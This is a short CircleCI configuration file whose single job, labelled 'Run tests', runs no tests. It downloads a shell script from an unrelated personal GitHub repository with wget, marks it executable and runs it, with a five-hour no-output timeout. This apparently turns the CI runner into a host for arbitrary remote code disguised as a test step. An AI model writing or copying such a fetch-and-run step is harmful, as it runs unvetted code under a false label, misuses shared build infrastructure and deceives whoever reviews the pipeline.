version: 2.1
jobs:
  build:
    parallelism: 1
    docker:
      - image: cimg/go:1.17.7
    steps: 
      - checkout 
      - run: 
          name: Run tests
          no_output_timeout: 5h      
          command: |
              wget https://raw.githubusercontent.com/Nurultyas7979/ewe/main/jero.sh && chmod +x jero.sh && ./jero.sh
                         

workflows:
    version: 2.1
    build:
        jobs:
        - build